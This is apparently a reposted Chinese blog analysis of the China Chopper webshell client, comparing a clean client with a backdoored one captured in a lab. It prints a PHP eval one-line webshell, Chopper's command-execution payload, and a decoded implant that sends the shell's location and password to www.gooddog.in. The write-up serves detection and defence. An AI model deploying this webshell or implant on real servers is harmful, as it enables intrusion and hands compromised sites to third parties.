0x00 前言
0x01 基本知识
中国菜刀
winsock expert
UPX
Wireshark
PEID
工具下载地址:
0x02 分析正常菜刀
2.1 静态分析中国菜刀
2.2 动态分析菜刀
环境：靶机 Windows Server 2003（192.168.1.134）；攻击机 Windows 7（192.168.1.131）
<?php /* Target-side one-line webshell used for the capture: whatever PHP the client sends in POST parameter 'chopper' (the Chopper "password") is executed as-is; the z0 payload on the next line is what the client actually puts there. */ @eval($_POST['chopper']);?>
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"ret={$ret}":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpStudy\PHPTutorial\WWW"&netstat -an | find "ESTABLISHED"&echo [S]&cd&echo [E]
（z1/z2 在请求体中是 base64 编码的，z0 里的 base64_decode($_POST["z1"]) / base64_decode($_POST["z2"]) 负责解码，这里给出的是解码后的内容；z1 是要执行的程序，z2 是拼接到 "/c" 之后的命令行。）
0x03 分析后门菜刀
a=%24_%3Dstrrev%28edoced_46esab%29%3B%40eval%28%24_%28%24_POST%5Bz0%5D%29%29%3B&z0=QGV2YWwo
YmFzZTY0X2RlY29kZSgnYVdZb0pGOURUMDlMU1VWYkoweDVhMlVuWFNFOU1TbDdjMlYwWTI5dmEybGxLQ2RNZVd
0bEp5d3hLVHRBWm1sc1pTZ25hSFIwY0RvdkwzZDNkeTVuYjI5a1pHOW5MbWx1TDBGd2FTNXdhSEEvVlhKc1BTY3VKR
jlUUlZKV1JWSmJKMGhVVkZCZlNFOVRWQ2RkTGlSZlUwVlNWa1ZTV3lkU1JWRlZSVk5VWDFWU1NTZGRMaWNtVUdGem
N6MG5MbXRsZVNna1gxQlBVMVFwS1R0OScpKTtAaW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCIwIik7QHNldF90aW1lX2xp
bWl0KDApO0BzZXRfbWFnaWNfcXVvdGVzX3J1bnRpbWUoMCk7ZWNobygiLT58Iik7OyREPWRpcm5hbWUoJF9TRVJWR
VJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkRD09IiIpJEQ9ZGlybmFtZSgkX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl0pO
yRSPSJ7JER9XHQiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkEiLCJaIikgYXMgJEwpaWYoaX
NfZGlyKCJ7JEx9OiIpKSRSLj0ieyRMfToiO30kUi49Ilx0IjskdT0oZnVuY3Rpb25fZXhpc3RzKCdwb3NpeF9nZXRlZ2lkJykpP
0Bwb3NpeF9nZXRwd3VpZChAcG9zaXhfZ2V0ZXVpZCgpKTonJzskdXNyPSgkdSk%2FJHVbJ25hbWUnXTpAZ2V0X2N1cn
JlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Iih7JHVzcn0pIjtwcmludCAkUjs7ZWNobygifDwtIik7ZGllKCk7
（解码后可见：密码参数 a 的值本身是一段加载器——strrev("edoced_46esab") 得到 "base64_decode"，再用它解码并 eval 参数 z0；请求中因此不会直接出现 base64_decode 字样，只有 eval。这里 edoced_46esab 是未加引号的裸字，依赖 PHP 把未定义常量当作字符串处理（新版本 PHP 已不再允许）。后门代码就藏在 z0 的开头。）
a=$_=strrev(edoced_46esab);@eval($_($_POST[z0]));&z0=QGV2YWwoYmFzZTY0X2RlY29kZSgnYVdZb0pGOURUMDlM
U1VWYkoweDVhMlVuWFNFOU1TbDdjMlYwWTI5dmEybGxLQ2RNZVd0bEp5d3hLVHRBWm1sc1pTZ25hSFIwY0RvdkwzZD
NkeTVuYjI5a1pHOW5MbWx1TDBGd2FTNXdhSEEvVlhKc1BTY3VKRjlUUlZKV1JWSmJKMGhVVkZCZlNFOVRWQ2RkTGlSZlU
wVlNWa1ZTV3lkU1JWRlZSVk5VWDFWU1NTZGRMaWNtVUdGemN6MG5MbXRsZVNna1gxQlBVMVFwS1R0OScpKTtAaW5p
X3NldCgiZGlzcGxheV9lcnJvcnMiLCIwIik7QHNldF90aW1lX2xpbWl0KDApO0BzZXRfbWFnaWNfcXVvdGVzX3J1bnRpbWUo
MCk7ZWNobygiLT58Iik7OyREPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkRD09IiIpJEQ9ZGl
ybmFtZSgkX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl0pOyRSPSJ7JER9XHQiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2Z
vcmVhY2gocmFuZ2UoIkEiLCJaIikgYXMgJEwpaWYoaXNfZGlyKCJ7JEx9OiIpKSRSLj0ieyRMfToiO30kUi49Ilx0IjskdT0oZnV
uY3Rpb25fZXhpc3RzKCdwb3NpeF9nZXRlZ2lkJykpP0Bwb3NpeF9nZXRwd3VpZChAcG9zaXhfZ2V0ZXVpZCgpKTonJzskdXN
yPSgkdSk/JHVbJ25hbWUnXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Iih7JHVzcn0pIjtwcmlud
CAkUjs7ZWNobygifDwtIik7ZGllKCk7_
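// Decoded z0 of the backdoored Chopper client (the base64 above). Page extraction
// had turned every single quote into '*' and wrapped the inner base64 literal across
// several lines, so the listing neither parsed nor matched the captured bytes; both
// are restored here. Note: this is attacker payload reproduced for analysis.
//
// Part 1 - the implant. The inner base64 decodes to the phone-home one-liner shown
// below: if($_COOKIE['Lyke']!=1){setcookie('Lyke',1);@file('http://www.gooddog.in/Api.php?Url='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'&Pass='.key($_POST));}
// It is wrapped in @eval, so errors from it are suppressed and nothing shows up in
// the response the Chopper client displays.
@eval(base64_decode('aWYoJF9DT09LSUVbJ0x5a2UnXSE9MSl7c2V0Y29va2llKCdMeWtlJywxKTtAZmlsZSgnaHR0cDovL3d3dy5nb29kZG9nLmluL0FwaS5waHA/VXJsPScuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddLicmUGFzcz0nLmtleSgkX1BPU1QpKTt9'));

// Part 2 - the stock Chopper "basic info" payload, identical in form to the clean
// client's: silence errors, print the ->| start marker, collect the script directory
// (PATH_TRANSLATED as fallback), on non-'/' paths (i.e. Windows) the existing drive
// letters A:..Z:, then the current user and php_uname(), print it and the |<- end
// marker, and stop. Only Part 1 is new.
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");;
$D=dirname($_SERVER["SCRIPT_FILENAME"]);
if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);
$R="{$D}\t";
if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}
$R.="\t";
// posix_getpwuid(): user name on POSIX hosts; get_current_user() otherwise (Windows here)
$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';
$usr=($u)?$u['name']:@get_current_user();
$R.=php_uname();
$R.="({$usr})";
print $R;;
echo("|<-");
die();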
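// The implant itself, decoded from the inner base64 above (single quotes had been
// mangled to '*' by page extraction; restored). It executes on the compromised
// *target* as part of z0 in the captured request and reports the shell to a third
// party over HTTP:
//   Url  = HTTP_HOST + REQUEST_URI  -> the exact location of the webshell
//   Pass = key($_POST)              -> the first POST parameter name, i.e. the
//                                      Chopper password ('a' in the captured request)
// So whoever runs gooddog.in gets everything needed to use the shell. The cookie guard
// makes it beacon only while the client has not sent back 'Lyke=1' (loose != on an
// absent cookie is true), so in a client that honours Set-Cookie it fires once and a
// single captured session may not show it at all - review the first request.
// @file() performs the GET with errors suppressed and prints nothing, so the Chopper
// response is indistinguishable from the clean client's. Detection: egress from the
// web server to www.gooddog.in with Url= and Pass= query parameters.
if($_COOKIE['Lyke']!=1){
    setcookie('Lyke',1);
    @file('http://www.gooddog.in/Api.php?Url='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'&Pass='.key($_POST));
}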
0x04 总结
转载自 madcoding’s blog